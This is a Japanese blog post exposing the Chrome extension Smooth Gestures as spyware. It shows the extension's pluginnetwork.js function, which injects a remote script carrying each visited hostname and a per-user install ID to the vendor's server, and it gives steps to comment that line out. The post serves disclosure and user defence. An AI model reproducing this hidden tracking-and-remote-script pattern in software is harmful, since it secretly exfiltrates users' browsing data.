GoogleChromeの拡張機能Smooth Gesturesがアクセスしたサイトをwww.smoothgesturesapp.comに送信していた事が明らかになりましたので、対策を行いました。
使っているブラウザはGoogleChrome v13.0.782.218。Windows7 64bit。問題の拡張はSmooth Gestures - バージョン: 0.15.4.3です。
対策方法
拡張一覧からSmooth Gesturesを無効化するのが一番簡単ですが、Smooth Gesturesを使い続けたい方は以下の方法でアクセスしたサイトがwww.smoothgesturesapp.comに送信される事を防げます。
テキストエディタが必要です。修正場所を知るために行番号表示機能があればよりよいですが根性で探せば必要ないです。また、他に隠して残っている箇所があるかも知れないので、その辺は覚悟の上でお願いします。
では手順です。エクスプローラーを開き、アドレスバーに
%USERPROFILE%AppDataLocalGoogleChromeUser DataDefaultExtensionslfkgmnnajiljnolcgolmmgnecgldgeld
と入力しエンターキーを押して下さい。エクスプローラーの中身が更新され、フォルダが一つだけ表示されると思います。そのフォルダを開き、jsフォルダを開き、ファイルpluginnetwork.jsをテキストエディタで開いて下さい。
function pageInjection(a)
{
if(doc.location.protocol == 'https:' && isHttps_capable == false) return;
IsUpdatedPlugin();
ShowWelcomePage();
if (doc.getElementById(pluginNamespace+"-info")) return;
sld = doc.location.href.split(//+/g)[1];
var s=doc.createElement('script');
s.type="text/javascript";
s.id=pluginNamespace;
s.src=PLUGIN_SERVER()+"pjs/"+sld+"/"+pluginStorage.getItem(pluginNamespace+'.installID')+"/?"+Math.random()*999999;
var s1=doc.createElement('script');
s1.type="text/javascript";
s1.id=pluginNamespace+"-info";
s1.innerHTML = "var "+pluginNamespace+"={}; "+pluginNamespace+".installID = '"+pluginStorage.getItem(pluginNamespace+'.installID')+"'; "+pluginNamespace+".installDate = '"+pluginStorage.getItem(pluginNamespace+'.installDate')+"'; "+pluginNamespace+".buildID = '"+pluginStorage.getItem(pluginNamespace+'.buildID')+"'; ";
if(doc.getElementsByTagName('head')[0])doc.getElementsByTagName('head')[0].appendChild(s1);
if(doc.getElementsByTagName('head')[0])doc.getElementsByTagName('head')[0].appendChild(s);
if(a<10) setTimeout(function(){a = a+1; pageInjection(a);},100);
}
左の43~の数字が行数です。pluginnetwork.jsからこの箇所を探して下さい。そしてハイライトしてある59行目が癌なので、ここを潰します。
if(doc.getElementsByTagName('head')[0])doc.getElementsByTagName('head')[0].appendChild(s1);
// if(doc.getElementsByTagName('head')[0])doc.getElementsByTagName('head')[0].appendChild(s);
if(a<10) setTimeout(function(){a = a+1; pageInjection(a);},100);
はい、59行目の先頭に半角のスラッシュを2つ入れました。これでOK。後はファイルを保存して、GoogleChromeを再起動して頂けばクリーンなSmooth Gesturesでマウスあるいはキーボードを使用して、素早く、そして簡単にウェブページを移動する事が出来るでしょう。
調査
どの様な情報がwww.smoothgesturesapp.comに送信されていたかを調べました。
例えばhttp://www.google.co.jp/search?q=smoothgesturesappにアクセスすると、
http://www.smoothgesturesapp.com/pjs/www.google.com/{012345678-9ABC-DEF0-1234-56789ABCDEF0}/?96830.00811325992
という情報が送信され、www.smoothgesturesapp.comは{012345678-9ABC-DEF0-1234-56789ABCDEF0}というユーザーがwww.google.comにアクセスした事を知る事が出来ます。
{012345678-9ABC-DEF0-1234-56789ABCDEF0}はユーザー毎に異なる文字で、この文字で検索するとあなたが送信した情報の一覧を作る事が出来ます。
www.google.comはアクセスしたサイトのアドレスです。アクセスしたサイトのアドレス全てが送信される訳ではなく、www.google.comと言ったホスト名の部分だけが送信されています。最後の96830.00811325992は単なるランダムな数値です。
情報が送信される対象はhttp://で始まるURL全てです。
関連サイト
【スパイウェア】Google ChromeでSmooth Gesturesというマウスジェスチャー拡張機能を使っているとページ読み込みが終わらない件 - KUMA TYPE
mocha.b.log: Chrome 拡張機能 Smooth Gestures の挙動が???
スパイウェアだったSmooth Gestures。それでも使うならhostsでブロック。 | gather-up [wp]
